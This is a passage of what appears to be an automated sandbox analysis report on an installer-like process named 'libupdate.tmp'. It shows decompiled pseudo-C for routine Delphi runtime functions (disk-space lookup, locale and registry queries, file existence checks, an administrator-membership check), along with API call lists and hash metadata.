                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                    • String ID:
                                                                    • API String ID: 3473537107-0
                                                                    • Opcode ID: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
                                                                    • Instruction ID: 8c15b2061d88d30e204a2d131290402b8da5209396f43898e5d703764eea749b
                                                                    • Opcode Fuzzy Hash: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
                                                                    • Instruction Fuzzy Hash: FCE07E8074634625FA6436F718D7BAE00084B36B4DF40593FFA08A92D2EEAC8C19522E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00420BD8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00420BD8() {
				void* __ebx;
				struct HINSTANCE__* _t1;
				void* _t4;

				_t1 = GetModuleHandleW(L"kernel32.dll");
				_t3 = _t1;
				if(_t1 != 0) {
					_t1 = E0040E1A8(_t3, _t4, _t3, L"GetDiskFreeSpaceExW");
					 *0x4b7e30 = _t1;
				}
				if( *0x4b7e30 == 0) {
					 *0x4b7e30 = E0041A4DC;
					return E0041A4DC;
				}
				return _t1;
			}






                                                                    0x00420bde
                                                                    0x00420be3
                                                                    0x00420be7
                                                                    0x00420bef
                                                                    0x00420bf4
                                                                    0x00420bf4
                                                                    0x00420c00
                                                                    0x00420c07
                                                                    0x00000000
                                                                    0x00420c07
                                                                    0x00420c0d

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00420CB4,00000000,00420CCC,?,?,00420C69), ref: 00420BDE
                                                                      • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                                    • API String ID: 1646373207-1127948838
                                                                    • Opcode ID: f76785e0005e833dd4a9f921d8d2e36157eed1af70da7a881872f52b203e86d0
                                                                    • Instruction ID: d69f2d486575a746b5ffe9d6a82661523d0842203aaa5c8b8dd0cb43f1f92830
                                                                    • Opcode Fuzzy Hash: f76785e0005e833dd4a9f921d8d2e36157eed1af70da7a881872f52b203e86d0
                                                                    • Instruction Fuzzy Hash: 31D05EB03143165FE7056BB2ACC561636C6AB86304B900B7BA5046A243CBFDDC50434C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Analysis Process: libupdate.tmp PID: 6668 Parent PID: 6948 libupdate.tmpCOMMON

                                                                    Executed Functions

                                                                    Function 0040E7F0, Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 73%
                                                                    			E0040E7F0(char __eax, void* __ebx, intOrPtr* __edx, void* __eflags) {
				char _v8;
				short _v12;
				void* _v16;
				char _v20;
				char _v24;
				void* _t29;
				void* _t40;
				intOrPtr* _t44;
				intOrPtr _t55;
				void* _t61;

				_push(__ebx);
				_v24 = 0;
				_v20 = 0;
				_t44 = __edx;
				_v8 = __eax;
				E0040A2AC(_v8);
				_push(_t61);
				_push(0x40e8b0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t61 + 0xffffffec;
				_t21 =  &_v16;
				L0040524C();
				GetLocaleInfoW( &_v16 & 0x0000ffff, 3, _t21, 4);
				E0040B318( &_v20, 4,  &_v16);
				E0040B4C8(_t44, _v20, _v8);
				_t29 = E0040E6A0( *_t44, _t44); // executed
				if(_t29 == 0) {
					_v12 = 0;
					E0040B318( &_v24, 4,  &_v16);
					E0040B4C8(_t44, _v24, _v8);
					_t40 = E0040E6A0( *_t44, _t44); // executed
					if(_t40 == 0) {
						E0040A1C8(_t44);
					}
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(E0040E8B7);
				E0040A228( &_v24, 2);
				return E0040A1C8( &_v8);
			}













                                                                    0x0040e7f6
                                                                    0x0040e7f9
                                                                    0x0040e7fc
                                                                    0x0040e7ff
                                                                    0x0040e801
                                                                    0x0040e807
                                                                    0x0040e80e
                                                                    0x0040e80f
                                                                    0x0040e814
                                                                    0x0040e817
                                                                    0x0040e81c
                                                                    0x0040e822
                                                                    0x0040e82b
                                                                    0x0040e83b
                                                                    0x0040e848
                                                                    0x0040e84f
                                                                    0x0040e856
                                                                    0x0040e858
                                                                    0x0040e869
                                                                    0x0040e876
                                                                    0x0040e87d
                                                                    0x0040e884
                                                                    0x0040e888
                                                                    0x0040e888
                                                                    0x0040e884
                                                                    0x0040e88f
                                                                    0x0040e892
                                                                    0x0040e895
                                                                    0x0040e8a2
                                                                    0x0040e8af

                                                                    APIs
                                                                    • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040E8B0,?,?), ref: 0040E822
                                                                    • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040E8B0,?,?), ref: 0040E82B
                                                                      • Part of subcall function 0040E6A0: FindFirstFileW.KERNEL32(00000000,?,00000000,0040E6FE,?,?), ref: 0040E6D3
                                                                      • Part of subcall function 0040E6A0: FindClose.KERNEL32(00000000,00000000,?,00000000,0040E6FE,?,?), ref: 0040E6E3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                    • String ID:
                                                                    • API String ID: 3216391948-0
                                                                    • Opcode ID: 4f4e845a1bd2874fd9ef47becd123c76b58742bb5706f28c9b712a7f9af8110b
                                                                    • Instruction ID: 1e50cd0e94847efb8cb05e6df71b151ee34378a03d53e12baea26e8823c5d93b
                                                                    • Opcode Fuzzy Hash: 4f4e845a1bd2874fd9ef47becd123c76b58742bb5706f28c9b712a7f9af8110b
                                                                    • Instruction Fuzzy Hash: 71114270A002099BDB04EF96D982AAEB3B9EF45304F90487EF904B73C1D7395E148B6D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0060C2B0, Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 60%
                                                                    			E0060C2B0(void* __eax, struct _WIN32_FIND_DATAW* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				char _v16;
				long _v20;
				void* _t13;
				intOrPtr _t27;
				void* _t35;
				void* _t37;
				intOrPtr _t38;

				_t35 = _t37;
				_t38 = _t37 + 0xfffffff0;
				if(E0060BF74(__eax,  &_v16) != 0) {
					_push(_t35);
					_push(0x60c313);
					_push( *[fs:eax]);
					 *[fs:eax] = _t38;
					_t13 = FindFirstFileW(E0040B278(__edx), __ecx); // executed
					_v8 = _t13;
					_v20 = GetLastError();
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(E0060C31A);
					return E0060BFB0( &_v16);
				} else {
					_v8 = 0xffffffff;
					return _v8;
				}
			}











                                                                    0x0060c2b1
                                                                    0x0060c2b3
                                                                    0x0060c2cb
                                                                    0x0060c2d8
                                                                    0x0060c2d9
                                                                    0x0060c2de
                                                                    0x0060c2e1
                                                                    0x0060c2ed
                                                                    0x0060c2f2
                                                                    0x0060c2fa
                                                                    0x0060c2ff
                                                                    0x0060c302
                                                                    0x0060c305
                                                                    0x0060c312
                                                                    0x0060c2cd
                                                                    0x0060c2cd
                                                                    0x0060c32c
                                                                    0x0060c32c

                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,0060C313,?,?,?,00000000), ref: 0060C2ED
                                                                    • GetLastError.KERNEL32(00000000,?,00000000,0060C313,?,?,?,00000000), ref: 0060C2F5
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorFileFindFirstLast
                                                                    • String ID:
                                                                    • API String ID: 873889042-0
                                                                    • Opcode ID: 48cb86c36632e8c72cb41299c80d55c8f2305584a3cc239000e223bcc48676ca
                                                                    • Instruction ID: 0e0656a6fbe86c5836fc78b0efda7e26b232c5910eabf30e6ebd6b813bae866c
                                                                    • Opcode Fuzzy Hash: 48cb86c36632e8c72cb41299c80d55c8f2305584a3cc239000e223bcc48676ca
                                                                    • Instruction Fuzzy Hash: 1BF0F931A84208ABCB14DFBA9C0189FF7ADEB4533075147BAF814D32D1DB744E004598
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040E6A0, Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 46%
                                                                    			E0040E6A0(char __eax, signed int __ebx) {
				char _v8;
				struct _WIN32_FIND_DATAW _v600;
				void* _t15;
				intOrPtr _t24;
				void* _t27;

				_push(__ebx);
				_v8 = __eax;
				E0040A2AC(_v8);
				_push(_t27);
				_push(0x40e6fe);
				_push( *[fs:eax]);
				 *[fs:eax] = _t27 + 0xfffffdac;
				_t15 = FindFirstFileW(E0040B278(_v8),  &_v600); // executed
				if((__ebx & 0xffffff00 | _t15 != 0xffffffff) != 0) {
					FindClose(_t15);
				}
				_pop(_t24);
				 *[fs:eax] = _t24;
				_push(E0040E705);
				return E0040A1C8( &_v8);
			}








                                                                    0x0040e6a9
                                                                    0x0040e6aa
                                                                    0x0040e6b0
                                                                    0x0040e6b7
                                                                    0x0040e6b8
                                                                    0x0040e6bd
                                                                    0x0040e6c0
                                                                    0x0040e6d3
                                                                    0x0040e6e0
                                                                    0x0040e6e3
                                                                    0x0040e6e3
                                                                    0x0040e6ea
                                                                    0x0040e6ed
                                                                    0x0040e6f0
                                                                    0x0040e6fd

                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,0040E6FE,?,?), ref: 0040E6D3
                                                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,0040E6FE,?,?), ref: 0040E6E3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: 45566dd6d5ea1f2d432aa336e5a60c1e3a8d7bb9a7f17ca8116a3bd58dd3b41d
                                                                    • Instruction ID: dec86fcb97929b74413189edb203bd87f329489ef31ab21fd3caa719f1a03e71
                                                                    • Opcode Fuzzy Hash: 45566dd6d5ea1f2d432aa336e5a60c1e3a8d7bb9a7f17ca8116a3bd58dd3b41d
                                                                    • Instruction Fuzzy Hash: 95F0B430540608AFCB10EBB6DC4295EB3ACEB4431479009B6F400F32D1EB395E10995C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C7CE0, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 181memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 43%
                                                                    			E005C7CE0(long __eax) {
				signed char _v5;
				void* _v12;
				char _v16;
				void* _v20;
				long _v24;
				void* _v28;
				struct _SID_IDENTIFIER_AUTHORITY* _v32;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t89;
				long _t97;
				signed int _t100;
				intOrPtr _t105;
				intOrPtr _t106;
				void* _t107;
				void* _t110;
				void* _t111;
				void* _t113;
				void* _t115;
				intOrPtr _t116;

				_t113 = _t115;
				_t116 = _t115 + 0xffffffe4;
				_push(_t107);
				_t97 = __eax;
				if(E00429D18() == 2) {
					_v5 = 0;
					_v32 = 0x6ccce0;
					if(AllocateAndInitializeSid(_v32, 2, 0x20, _t97, 0, 0, 0, 0, 0, 0,  &_v12) == 0) {
						goto L26;
					} else {
						_push(_t113);
						_push(0x5c7ecb);
						_push( *[fs:eax]);
						 *[fs:eax] = _t116;
						_t99 = 0;
						if((GetVersion() & 0x000000ff) >= 5) {
							_t99 = E00414020(0, _t107, GetModuleHandleW(L"advapi32.dll"), L"CheckTokenMembership");
						}
						if(_t99 == 0) {
							_v28 = 0;
							if(OpenThreadToken(GetCurrentThread(), 8, 0xffffffff,  &_v20) != 0) {
								L13:
								_push(_t113);
								_push(0x5c7ead);
								_push( *[fs:eax]);
								 *[fs:eax] = _t116;
								_v24 = 0;
								if(GetTokenInformation(_v20, 2, 0, 0,  &_v24) != 0 || GetLastError() == 0x7a) {
									_v28 = E00406F0C(_v24);
									if(GetTokenInformation(_v20, 2, _v28, _v24,  &_v24) != 0) {
										_t110 =  *_v28 - 1;
										if(_t110 >= 0) {
											_t111 = _t110 + 1;
											_t100 = 0;
											while(EqualSid(_v12,  *(_v28 + 4 + _t100 * 8)) == 0 || ( *(_v28 + 8 + _t100 * 8) & 0x00000014) != 4) {
												_t100 = _t100 + 1;
												_t111 = _t111 - 1;
												if(_t111 != 0) {
													continue;
												}
												goto L24;
											}
											_v5 = 1;
										}
										L24:
										_pop(_t105);
										 *[fs:eax] = _t105;
										_push(E005C7EB4);
										E00406F28(_v28);
										return CloseHandle(_v20);
									} else {
										E004099B8();
										E004099B8();
										goto L26;
									}
								} else {
									E004099B8();
									E004099B8();
									goto L26;
								}
							} else {
								if(GetLastError() == 0x3f0) {
									if(OpenProcessToken(GetCurrentProcess(), 8,  &_v20) != 0) {
										goto L13;
									} else {
										E004099B8();
										goto L26;
									}
								} else {
									E004099B8();
									goto L26;
								}
							}
						} else {
							_t89 =  *_t99(0, _v12,  &_v16); // executed
							if(_t89 != 0) {
								asm("sbb eax, eax");
								_v5 = _t89 + 1;
							}
							_pop(_t106);
							 *[fs:eax] = _t106;
							_push(E005C7ED2);
							return FreeSid(_v12);
						}
					}
				} else {
					_v5 = 1;
					L26:
					return _v5 & 0x000000ff;
				}
			}
























                                                                    0x005c7ce1
                                                                    0x005c7ce3
                                                                    0x005c7ce7
                                                                    0x005c7ce8
                                                                    0x005c7cf2
                                                                    0x005c7cfd
                                                                    0x005c7d06
                                                                    0x005c7d29
                                                                    0x00000000
                                                                    0x005c7d2f
                                                                    0x005c7d31
                                                                    0x005c7d32
                                                                    0x005c7d37
                                                                    0x005c7d3a
                                                                    0x005c7d3d
                                                                    0x005c7d4d
                                                                    0x005c7d64
                                                                    0x005c7d64
                                                                    0x005c7d68
                                                                    0x005c7d8f
                                                                    0x005c7da7
                                                                    0x005c7dde
                                                                    0x005c7de0
                                                                    0x005c7de1
                                                                    0x005c7de6
                                                                    0x005c7de9
                                                                    0x005c7dee
                                                                    0x005c7e06
                                                                    0x005c7e29
                                                                    0x005c7e45
                                                                    0x005c7e58
                                                                    0x005c7e5b
                                                                    0x005c7e5d
                                                                    0x005c7e5e
                                                                    0x005c7e60
                                                                    0x005c7e8a
                                                                    0x005c7e8b
                                                                    0x005c7e8c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x005c7e8c
                                                                    0x005c7e84
                                                                    0x005c7e84
                                                                    0x005c7e8e
                                                                    0x005c7e90
                                                                    0x005c7e93
                                                                    0x005c7e96
                                                                    0x005c7e9e
                                                                    0x005c7eac
                                                                    0x005c7e47
                                                                    0x005c7e47
                                                                    0x005c7e4c
                                                                    0x00000000
                                                                    0x005c7e4c
                                                                    0x005c7e12
                                                                    0x005c7e12
                                                                    0x005c7e17
                                                                    0x00000000
                                                                    0x005c7e17
                                                                    0x005c7da9
                                                                    0x005c7db3
                                                                    0x005c7dd2
                                                                    0x00000000
                                                                    0x005c7dd4
                                                                    0x005c7dd4
                                                                    0x00000000
                                                                    0x005c7dd4
                                                                    0x005c7db5
                                                                    0x005c7db5
                                                                    0x00000000
                                                                    0x005c7db5
                                                                    0x005c7db3
                                                                    0x005c7d6a
                                                                    0x005c7d74
                                                                    0x005c7d78
                                                                    0x005c7d82
                                                                    0x005c7d85
                                                                    0x005c7d85
                                                                    0x005c7eb6
                                                                    0x005c7eb9
                                                                    0x005c7ebc
                                                                    0x005c7eca
                                                                    0x005c7eca
                                                                    0x005c7d68
                                                                    0x005c7cf4
                                                                    0x005c7cf4
                                                                    0x005c7ed2
                                                                    0x005c7edb
                                                                    0x005c7edb

                                                                    APIs
                                                                    • AllocateAndInitializeSid.ADVAPI32(00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D22
                                                                    • GetVersion.KERNEL32(00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D3F
                                                                    • GetModuleHandleW.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D59
                                                                    • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D74
                                                                    • FreeSid.ADVAPI32(00000000,005C7ED2,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7EC5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AllocateCheckFreeHandleInitializeMembershipModuleTokenVersion
                                                                    • String ID: CheckTokenMembership$advapi32.dll
                                                                    • API String ID: 2691416632-1888249752
                                                                    • Opcode ID: 1e224452f98f28684b28cd542a9aef5b7292b81c784e0a64638696cbd7ae50c3
                                                                    • Instruction ID: 9e47304f2c2519385998e5d426bc562542af73c677c294aaacd6cf1c30b33c32
                                                                    • Opcode Fuzzy Hash: 1e224452f98f28684b28cd542a9aef5b7292b81c784e0a64638696cbd7ae50c3
                                                                    • Instruction Fuzzy Hash: A2514472A0830D6EDB11EAF98D42FBE7BACBF1C705F1044AEF501E6681D6789D408B65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040E2C4, Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 78%
                                                                    			E0040E2C4(char __eax, void* __ebx, void* __ecx, void* __edx) {
				char _v8;
				char* _v12;
				void* _v16;
				int _v20;
				short _v542;
				long _t51;
				long _t85;
				long _t87;
				long _t89;
				long _t91;
				long _t93;
				void* _t97;
				intOrPtr _t106;
				intOrPtr _t108;
				void* _t112;
				void* _t113;
				intOrPtr _t114;

				_t112 = _t113;
				_t114 = _t113 + 0xfffffde4;
				_t97 = __edx;
				_v8 = __eax;
				E0040A2AC(_v8);
				_push(_t112);
				_push(0x40e4e9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t114;
				if(_v8 != 0) {
					E0040DAF8( &_v542, E0040B278(_v8), 0x105);
				} else {
					GetModuleFileNameW(0,  &_v542, 0x105);
				}
				if(_v542 == 0) {
					L18:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(E0040E4F0);
					return E0040A1C8( &_v8);
				} else {
					_v12 = 0;
					_t51 = RegOpenKeyExW(0x80000001, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
					if(_t51 == 0) {
						L10:
						_push(_t112);
						_push(0x40e4cc);
						_push( *[fs:eax]);
						 *[fs:eax] = _t114;
						E0040E0D4( &_v542, 0x105);
						if(RegQueryValueExW(_v16,  &_v542, 0, 0, 0,  &_v20) != 0) {
							if(RegQueryValueExW(_v16, E0040E5DC, 0, 0, 0,  &_v20) == 0) {
								_v12 = E00406F0C(_v20);
								RegQueryValueExW(_v16, E0040E5DC, 0, 0, _v12,  &_v20);
								E0040B2DC(_t97, _v12);
							}
						} else {
							_v12 = E00406F0C(_v20);
							RegQueryValueExW(_v16,  &_v542, 0, 0, _v12,  &_v20);
							E0040B2DC(_t97, _v12);
						}
						_pop(_t108);
						 *[fs:eax] = _t108;
						_push(E0040E4D3);
						if(_v12 != 0) {
							E00406F28(_v12);
						}
						return RegCloseKey(_v16);
					} else {
						_t85 = RegOpenKeyExW(0x80000002, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
						if(_t85 == 0) {
							goto L10;
						} else {
							_t87 = RegOpenKeyExW(0x80000001, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
							if(_t87 == 0) {
								goto L10;
							} else {
								_t89 = RegOpenKeyExW(0x80000002, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
								if(_t89 == 0) {
									goto L10;
								} else {
									_t91 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Locales", 0, 0xf0019,  &_v16); // executed
									if(_t91 == 0) {
										goto L10;
									} else {
										_t93 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v16); // executed
										if(_t93 != 0) {
											goto L18;
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				}
			}




















                                                                    0x0040e2c5
                                                                    0x0040e2c7
                                                                    0x0040e2ce
                                                                    0x0040e2d0
                                                                    0x0040e2d6
                                                                    0x0040e2dd
                                                                    0x0040e2de
                                                                    0x0040e2e3
                                                                    0x0040e2e6
                                                                    0x0040e2ed
                                                                    0x0040e319
                                                                    0x0040e2ef
                                                                    0x0040e2fd
                                                                    0x0040e2fd
                                                                    0x0040e326
                                                                    0x0040e4d3
                                                                    0x0040e4d5
                                                                    0x0040e4d8
                                                                    0x0040e4db
                                                                    0x0040e4e8
                                                                    0x0040e32c
                                                                    0x0040e32e
                                                                    0x0040e346
                                                                    0x0040e34d
                                                                    0x0040e3ed
                                                                    0x0040e3ef
                                                                    0x0040e3f0
                                                                    0x0040e3f5
                                                                    0x0040e3f8
                                                                    0x0040e406
                                                                    0x0040e427
                                                                    0x0040e476
                                                                    0x0040e480
                                                                    0x0040e498
                                                                    0x0040e4a2
                                                                    0x0040e4a2
                                                                    0x0040e429
                                                                    0x0040e431
                                                                    0x0040e44b
                                                                    0x0040e455
                                                                    0x0040e455
                                                                    0x0040e4a9
                                                                    0x0040e4ac
                                                                    0x0040e4af
                                                                    0x0040e4b8
                                                                    0x0040e4bd
                                                                    0x0040e4bd
                                                                    0x0040e4cb
                                                                    0x0040e353
                                                                    0x0040e368
                                                                    0x0040e36f
                                                                    0x00000000
                                                                    0x0040e371
                                                                    0x0040e386
                                                                    0x0040e38d
                                                                    0x00000000
                                                                    0x0040e38f
                                                                    0x0040e3a4
                                                                    0x0040e3ab
                                                                    0x00000000
                                                                    0x0040e3ad
                                                                    0x0040e3c2
                                                                    0x0040e3c9
                                                                    0x00000000
                                                                    0x0040e3cb
                                                                    0x0040e3e0
                                                                    0x0040e3e7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040e3e7
                                                                    0x0040e3c9
                                                                    0x0040e3ab
                                                                    0x0040e38d
                                                                    0x0040e36f
                                                                    0x0040e34d

                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040E4E9,?,?), ref: 0040E2FD
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9,?,?), ref: 0040E346
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9,?,?), ref: 0040E368
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040E386
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040E3A4
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040E3C2
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040E3E0
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9), ref: 0040E420
